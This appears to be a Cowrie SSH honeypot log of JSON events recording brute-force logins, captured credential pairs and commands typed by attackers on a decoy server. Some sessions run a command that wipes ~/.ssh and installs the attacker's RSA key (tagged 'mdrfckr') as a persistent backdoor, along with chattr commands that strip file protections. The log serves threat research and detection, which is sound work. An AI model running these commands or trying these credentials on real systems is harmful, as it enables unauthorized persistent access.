{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:01:45.919824Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:01:46.034264Z","src_ip":"212.227.235.229","session":"8e9e6c6550b1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:46.052817Z","src_ip":"212.227.235.229","session":"a4de938840cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:01:46.085294Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:46.086063Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:47.299159Z","src_ip":"212.227.235.229","session":"8e9e6c6550b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41136,"dst_ip":"1.2.3.4","dst_port":22,"session":"426ab640bfe7","protocol":"ssh","message":"New connection: 212.227.235.229:41136 (1.2.3.4:22) [session: 426ab640bfe7]","sensor":"my-vps","timestamp":"2025-09-08T13:01:47.557762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:47.558383Z","src_ip":"212.227.235.229","session":"426ab640bfe7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:47.816954Z","src_ip":"212.227.235.229","session":"426ab640bfe7"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":48418,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e49cf9a58d8","protocol":"ssh","message":"New connection: 139.59.14.27:48418 (1.2.3.4:22) [session: 6e49cf9a58d8]","sensor":"my-vps","timestamp":"2025-09-08T13:01:47.894783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:47.895540Z","src_ip":"139.59.14.27","session":"6e49cf9a58d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:48.219623Z","src_ip":"139.59.14.27","session":"6e49cf9a58d8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:01:48.891862Z","src_ip":"212.227.235.229","session":"426ab640bfe7"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:49.151487Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:49.153398Z","src_ip":"212.227.235.229","session":"426ab640bfe7"}
{"eventid":"cowrie.session.connect","src_ip":"107.172.16.161","src_port":52560,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e5eb4ef46c9","protocol":"ssh","message":"New connection: 107.172.16.161:52560 (1.2.3.4:22) [session: 2e5eb4ef46c9]","sensor":"my-vps","timestamp":"2025-09-08T13:01:49.292857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:49.293505Z","src_ip":"107.172.16.161","session":"2e5eb4ef46c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:49.459439Z","src_ip":"107.172.16.161","session":"2e5eb4ef46c9"}
{"eventid":"cowrie.login.failed","username":"ali","password":"ali1234","message":"login attempt [ali/ali1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:01:49.574255Z","src_ip":"139.59.14.27","session":"6e49cf9a58d8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:01:50.164539Z","src_ip":"107.172.16.161","session":"2e5eb4ef46c9"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:50.901391Z","src_ip":"139.59.14.27","session":"6e49cf9a58d8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:51.331841Z","src_ip":"107.172.16.161","session":"2e5eb4ef46c9"}
{"eventid":"cowrie.session.connect","src_ip":"107.172.16.161","src_port":52572,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb6eb74a62dd","protocol":"ssh","message":"New connection: 107.172.16.161:52572 (1.2.3.4:22) [session: cb6eb74a62dd]","sensor":"my-vps","timestamp":"2025-09-08T13:01:51.494293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:51.495178Z","src_ip":"107.172.16.161","session":"cb6eb74a62dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:51.659438Z","src_ip":"107.172.16.161","session":"cb6eb74a62dd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:01:52.359091Z","src_ip":"107.172.16.161","session":"cb6eb74a62dd"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:52.523440Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:52.524525Z","src_ip":"107.172.16.161","session":"cb6eb74a62dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39714,"dst_ip":"1.2.3.4","dst_port":22,"session":"11b1089aac57","protocol":"ssh","message":"New connection: 212.227.235.229:39714 (1.2.3.4:22) [session: 11b1089aac57]","sensor":"my-vps","timestamp":"2025-09-08T13:02:03.512534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:03.513624Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:03.670468Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.login.success","username":"root","password":"rooted","message":"login attempt [root/rooted] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:02:04.341454Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:02:04.729136Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:02:04.730054Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:02:04.731496Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:04.890393Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:02:05.221902Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:02:05.222619Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:02:05.382636Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:05.383515Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39720,"dst_ip":"1.2.3.4","dst_port":22,"session":"90011c546f7a","protocol":"ssh","message":"New connection: 212.227.235.229:39720 (1.2.3.4:22) [session: 90011c546f7a]","sensor":"my-vps","timestamp":"2025-09-08T13:02:05.547708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:05.548501Z","src_ip":"212.227.235.229","session":"90011c546f7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:05.712729Z","src_ip":"212.227.235.229","session":"90011c546f7a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:02:06.412354Z","src_ip":"212.227.235.229","session":"90011c546f7a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:07.578327Z","src_ip":"212.227.235.229","session":"90011c546f7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39722,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f506260e784","protocol":"ssh","message":"New connection: 212.227.235.229:39722 (1.2.3.4:22) [session: 9f506260e784]","sensor":"my-vps","timestamp":"2025-09-08T13:02:07.740569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:07.741243Z","src_ip":"212.227.235.229","session":"9f506260e784"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:07.899730Z","src_ip":"212.227.235.229","session":"9f506260e784"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:02:08.580364Z","src_ip":"212.227.235.229","session":"9f506260e784"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:08.740324Z","src_ip":"212.227.235.229","session":"11b1089aac57"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:08.741222Z","src_ip":"212.227.235.229","session":"9f506260e784"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44392,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0210ef1ae20","protocol":"ssh","message":"New connection: 134.199.174.250:44392 (1.2.3.4:22) [session: d0210ef1ae20]","sensor":"my-vps","timestamp":"2025-09-08T13:02:14.422723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:02:14.423461Z","src_ip":"134.199.174.250","session":"d0210ef1ae20"}
